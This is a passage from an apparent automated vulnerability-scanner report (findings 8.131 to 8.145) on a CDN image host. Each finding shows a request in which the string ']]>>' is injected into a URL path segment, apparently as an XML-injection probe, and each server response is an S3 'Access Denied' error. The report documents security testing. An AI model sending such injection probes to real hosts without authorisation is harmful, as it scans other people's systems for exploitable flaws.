Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 377FBDCC29C31230
x-amz-id-2: RzRhHHK3aHKwhsxS4I8d+VQbrSJq/ZRsD0kFS4t9ea8X9Z7waF+frcWt+Q3GgVvN
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:12 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 51a4ff1fb636cb8ad5b6c199b4b9c9fd1bea5c9799a403576b853cfdd50b4572e48b00011912dd94
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>377FBDCC29C31230</RequestId><HostId>RzRhHHK3aHKwhsxS4I8d+VQbrSJq/ZRsD0kFS4t9ea8X9Z7waF
...[SNIP]...

8.132. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E7483FE997F729DE
x-amz-id-2: 2/cWkLeIPBPye+LRMQi5QP0NHjMfd5HouwuqUHlLUCeDAQRm/30ufTWdb1NCOPfE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 57d38ba1ab33ddbf741b059fb1e2bfc091ba25958c6522fbfe1665b9a5837fbd4a7547e5d5884402
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E7483FE997F729DE</RequestId><HostId>2/cWkLeIPBPye+LRMQi5QP0NHjMfd5HouwuqUHlLUCeDAQRm/3
...[SNIP]...

8.133. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EF2B733D8B34580A
x-amz-id-2: utxwqum4ypR690sRWCsRBHVwhS9seIJxvlPZVEk6OhJE8QaS25AlgjKhNgFu0j7B
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ae9ff3ee7246e56ca0043d5d1c573b5760f2138625c3be90fc6ee6704117fca6bf69c70f32db6826
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EF2B733D8B34580A</RequestId><HostId>utxwqum4ypR690sRWCsRBHVwhS9seIJxvlPZVEk6OhJE8QaS25
...[SNIP]...

8.134. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DDBBEF72D8EFF466
x-amz-id-2: BDhddrxxQ/jnGgM1XaN/SKDisfxEbcLejIAVvp48MUgaK54Xy8rA6qwzrJSxmpGe
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bcb0f7080aa81618f2ec484692a8d7637ac082e08c51ad68773778aab8ea3b0075ac62bb0bb1f768
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DDBBEF72D8EFF466</RequestId><HostId>BDhddrxxQ/jnGgM1XaN/SKDisfxEbcLejIAVvp48MUgaK54Xy8
...[SNIP]...

8.135. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 629B825C73A5F582
x-amz-id-2: O8oC3fWTiHe6tz196V9Eg3OpamS29r2eL/67nIwFHtiLn1nt1HVKfAGnmzibBUdU
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ae7dfa33717bddfbe61bbbc2a29741fa75bc24041be391df064425acb5cb91027ba2fbe75e606f47
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>629B825C73A5F582</RequestId><HostId>O8oC3fWTiHe6tz196V9Eg3OpamS29r2eL/67nIwFHtiLn1nt1H
...[SNIP]...

8.136. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D8452E3943080B97
x-amz-id-2: X9YEJES9UalHTXMR4n+8gEu4qE3DuRDN+1jp6oxBTKvlCIM20cWU5EarPE1cfxSx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9342bb22db6744973bfc4aef9935c8a02d19c3c4bcb38cea7b450fb7f8cdb0f3488419645767d230
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D8452E3943080B97</RequestId><HostId>X9YEJES9UalHTXMR4n+8gEu4qE3DuRDN+1jp6oxBTKvlCIM20c
...[SNIP]...

8.137. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6B192F43EB3D22B1
x-amz-id-2: /MPhZWHAli3i9HuO46NMuLm2JBMR1ZBZJro5vj3qNchhwk9SlA4d3nRFATO+H6UJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 73a4f4e60bdae0b11b32161edc3e3ce36f5236821d9dd52a18863505784b4c5d21a0feabf440d496
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6B192F43EB3D22B1</RequestId><HostId>/MPhZWHAli3i9HuO46NMuLm2JBMR1ZBZJro5vj3qNchhwk9SlA
...[SNIP]...

8.138. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff3333-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7D947AC38BC4C24B
x-amz-id-2: SSyNlMe6MN1tsSfz0wBueHJ/ASEEIHXHaKl00xX9FjUM37zhSuUgeCJ1lddSWw0T
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a770fa60848c135be80f1ed71525cdba1c0f76f6af02ea1245b96e3622127ca10cac763863e53301
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7D947AC38BC4C24B</RequestId><HostId>SSyNlMe6MN1tsSfz0wBueHJ/ASEEIHXHaKl00xX9FjUM37zhSu
...[SNIP]...

8.139. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff3333-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5718732E27C7A18A
x-amz-id-2: HextwXS1y0ZxjjlfEeAqdxAgn5cozSYjs0GQHJirRmskxA4FDzCmUnf8D8Za6h/1
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2df3682e55993d0fcd1e61032e430509e472295e82fdcc8583d7a104267eb7c666df4fac22ce5240
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5718732E27C7A18A</RequestId><HostId>HextwXS1y0ZxjjlfEeAqdxAgn5cozSYjs0GQHJirRmskxA4FDz
...[SNIP]...

8.140. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff3333-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FADCD3A3CDEC384E
x-amz-id-2: hdtkVfvaDSn8KVlYKRDQSJOzvNd91iFA6qabwt1dkONUrUS+ZHDC/bXSMb7+zRpE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:17 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 317ab6cf0d003042a3cffadf50660d27e74a5291f74cd6f4dc984230102427903a6e5b68d170b5a1
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FADCD3A3CDEC384E</RequestId><HostId>hdtkVfvaDSn8KVlYKRDQSJOzvNd91iFA6qabwt1dkONUrUS+ZH
...[SNIP]...

8.141. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 06BCE8FE03E01579
x-amz-id-2: XbMlLfUuOmy8D3Nn2vkaXNTRhOSaa5u7E6AkQlLkCTLfFkErUywO4uMlxk+0DR5z
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:22 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 456ace92c268b41320ca92ea868cbcc8bf293bba7e8532d285ef8e2d0c1973048bc307d1ad153cf2
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>06BCE8FE03E01579</RequestId><HostId>XbMlLfUuOmy8D3Nn2vkaXNTRhOSaa5u7E6AkQlLkCTLfFkErUy
...[SNIP]...

8.142. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff6633-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A59AF21ECF545A14
x-amz-id-2: KZIDMfnB0dk/+BSHr98bTVFs2Zo8x32t6yFiIcRFlYcEtaZch/V1hLTcMH7r170t
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c59f51a4ce3ab26d0d75970982138f85cc9a2324b9fdb53a2fef567a022fd7dbf30f780fbb821be4
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A59AF21ECF545A14</RequestId><HostId>KZIDMfnB0dk/+BSHr98bTVFs2Zo8x32t6yFiIcRFlYcEtaZch/
...[SNIP]...

8.143. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff6633-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 69B0A1BCE831F459
x-amz-id-2: qnN9Z8K50GV0ODlVDPmC+OYapbcGhbXGh3QeZY2L2aWxdTGDPYr5fT+NRy5Os27m
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:00 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4935e3ea98757691a094dd18f58054ee3523e986c75b420401f87cd73606af77fbed17bfb701cb0b
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>69B0A1BCE831F459</RequestId><HostId>qnN9Z8K50GV0ODlVDPmC+OYapbcGhbXGh3QeZY2L2aWxdTGDPY
...[SNIP]...

8.144. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff6633-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D6EAE93D639422F7
x-amz-id-2: t4W6tCn5nOYApwxsh42lf6XfkQSvkWAskqTgUVJRKTfzybPohalzl/zuK5DechrU
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:09 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7dca6e726f2450b3178394ce39766a1d6e7f219d50c63eb2ef67394fdce79e3597de44af70596c89
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D6EAE93D639422F7</RequestId><HostId>t4W6tCn5nOYApwxsh42lf6XfkQSvkWAskqTgUVJRKTfzybPoha
...[SNIP]...

8.145. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F6DB41A8EFBD2BAA
